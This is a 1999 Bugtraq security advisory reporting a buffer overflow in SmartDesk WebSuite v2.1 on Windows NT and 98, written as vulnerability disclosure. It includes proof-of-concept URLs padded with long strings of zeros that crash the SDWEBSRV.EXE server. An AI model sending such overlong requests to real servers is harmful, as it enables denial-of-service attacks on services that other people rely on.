From cmart@mail.staticusers.net Mon May 31 06:40:49 1999 From: cmart To: BUGTRAQ@netspace.org Date: Tue, 25 May 1999 20:53:17 PDT Subject: Buffer overflow in SmartDesk WebSuite v2.1 Advisory: Buffer overflow in SmartDesk WebSuite v2.1 Platforms Affected: Windows NT, Windows 98 Found by: cmart (cmart@staticusers.net) Date: 5/23/99 Description: ----------- WebSuite v2.1 will crash when an additional 250+ characters is appended after the sites URL on NT Server 4 and NT Workstation 4 boxes. Running on top of Windows 98 it will crash with 150+ characters appended after the sites URL. After reinstallating on both platforms several times, the overflow string length varied. Approximately 1 out of 8 times the overflow string went from 150 chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about 2000+ chars. After the server crashes on NT Workstation 4, it's unable to find the lib file sysclass.flb. (On our test). Details: ------- [Windows NT] http://hostname/00000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000 SDWEBSRV.EXE crashes. [Windows 98] http://hostname/00000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000 SDWEBSRV.EXE crashes. ----------------------------- cmart | cmart@staticusers.net http://winntsec.com -----------------------------